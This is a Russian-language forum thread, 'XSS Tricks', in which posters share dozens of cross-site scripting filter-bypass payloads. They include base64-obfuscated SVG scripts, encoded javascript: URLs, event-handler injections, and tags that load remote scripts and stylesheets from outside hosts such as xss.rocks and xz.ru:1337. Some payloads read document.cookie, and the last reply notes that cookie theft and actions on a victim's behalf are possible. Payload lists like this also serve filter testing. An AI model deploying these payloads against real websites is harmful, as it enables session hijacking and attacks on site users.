XSS Tricks

[SooLFaa]

Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему.

Payload #1:

<svg xml:base="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+">
<use xlink:href="#rectangle" />
</svg>

Payload #2:

<svg>
<a href>
  <animate attributeName="href" from="javascript:alert(1)" to="javascript:alert(1)" ></animate>
  <circle r=50></circle>
</a>
</svg>

Payload #3:

<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

Payload #4:

'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">

Payload #5:

<IMG SRC="javascript:alert('XSS');">

Payload #6:

<IMG SRC=javascript:alert('XSS')>

Payload #7:

<IMG SRC=JaVaScRiPt:alert('XSS')>

Payload #8:

<IMG SRC=javascript:alert("XSS")>

Payload #9:

<IMG SRC=`javascript:alert("XSS")`>

Payload #10:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

Payload #11:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Payload #12:

<IMG SRC=# onmouseover="alert('xxs')">

Payload #13:

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

Payload #14:

<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Payload #15:

<IMG SRC=javascript:alert( 'XSS')>

Payload #16:

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Payload #17:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Payload #18:

<IMG SRC="jav ascript:alert('XSS');">

Payload #19:

<IMG SRC="jav	ascript:alert('XSS');">

Payload #20:

<IMG SRC="jav
ascript:alert('XSS');">

Payload #21:

jav
ascript:alert('XSS');

Payload #22:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

Payload #23:

<<SCRIPT>alert("XSS");//<</SCRIPT>

Payload #24:

<SCRIPT SRC=http://xss.rocks/xss.js?< B >

Payload #25:

<IMG SRC="javascript:alert('XSS')"

Payload #26:

<iframe src=http://xz.ru:1337/scriptlet.html <

Payload #27:

<BODY BACKGROUND="javascript:alert('XSS')">

Payload #28:

<IMG DYNSRC="javascript:alert('XSS')">

Payload #29:

<IMG LOWSRC="javascript:alert('XSS')">

Payload #30:

<style>li {list-style-image: url("javascript:alert('XSS')");}</style><UL><LI>XSS</br>

Payload #32:

<BGSOUND SRC="javascript:alert('XSS');">

Payload #33:

<BR SIZE="&{alert('XSS')}">

Payload #34:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

Payload #35:

<LINK REL="stylesheet" HREF="http://xz.ru:1337/xss.css">

Payload #36:

<STYLE>@import'http://xz.ru:1337/xss.css';</STYLE>

Payload #37:

<META HTTP-EQUIV="Link" Content="<http://xz.ru:1337/xss.css>; REL=stylesheet">

Payload #38:

<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

Payload #39:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

Payload #40:

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Payload #41:

exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

Payload #42:

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

Payload #43:

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

Payload #44:

¼script¾alert(¢XSS¢)¼/script¾

Payload #45:

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

Payload #46:

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Payload #47:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Payload #48:

<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

Payload #49:

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

Payload #50:

<TABLE BACKGROUND="javascript:alert('XSS')">

Payload #51:

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

Payload #52:

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

Payload #53:

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

Payload #54:

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

Payload #55:

<DIV STYLE="background-image: url(
javascript:alert('XSS'))">

Payload #56:

<DIV STYLE="width: expression(alert('XSS'));">

Payload #57:

<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->

Payload #58:

<BASE HREF="javascript:alert('XSS');//">

Payload #59:

<OBJECT TYPE="text/x-scriptlet" DATA="http://xz.ru:1337/scriptlet.html"></OBJECT>

Payload #60:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Payload #62:

<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML>

Payload #63:

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Payload #64:

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Payload #65:

<input onfocus=write(1) autofocus>

Payload #66:

<video poster=javascript:alert(1)//></video>

Payload #67:

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

Payload #68:

<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

Payload #69:

<video><source onerror="alert(1)">

Payload #70:

<iframe srcdoc="<img src&equals;x:x onerror&equals;alert&lpar;1&rpar;>" />

Payload #71:

<picture><source srcset="x"><img onerror="alert(1)"></picture>

Payload #72:

<iframe srcdoc="<svg onload=alert(1)&nvgt;"></iframe>

Payload #73:

<details open ontoggle="alert(1)">

Payload #74:

<img[a]src=x[d]onerror[c]=[e]"alert(1)">

Payload #75:

<tagname someattribute1=value onSomeEvent="var x=10;alert(x); ">

 

[Dr.Lafa]

<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">

<!--<img src="--><img src=x onerror=alert(123)//">

<style><img src="</style><img src=x onerror=alert(XSS)//">

<input onfocus=write(XSS) autofocus>

 

[fpg7]

"-->'></script><script/src=//youdomen.thisamazing/xss.js></script>" это любимое, а так
https://github.com/foospidy/payloads/blob/master/other/xss/rafaybaloch.txt - тоже работают отлично

 

[masscontrolx]

подскажите, в в пользовательском поиске на сайте у себя вставляю <script>promt(/XSS/)</script> и это срабатывает, как эксплуатировать такое? доступ к файлам на сервере для просмотра\редактирования возможно получить?

 

[mickey01w]

подскажите, в в пользовательском поиске на сайте у себя вставляю <script>promt(/XSS/)</script> и это срабатывает, как эксплуатировать такое? доступ к файлам на сервере для просмотра\редактирования возможно получить? Посмотреть вложение 23926

Нет, это атака на пользователя сайта, так как js-код исполняется в контексте браузера пользователя. Импакт может быть различный, от кражи пользовательских кук и до зловредных действий от имени жертвы.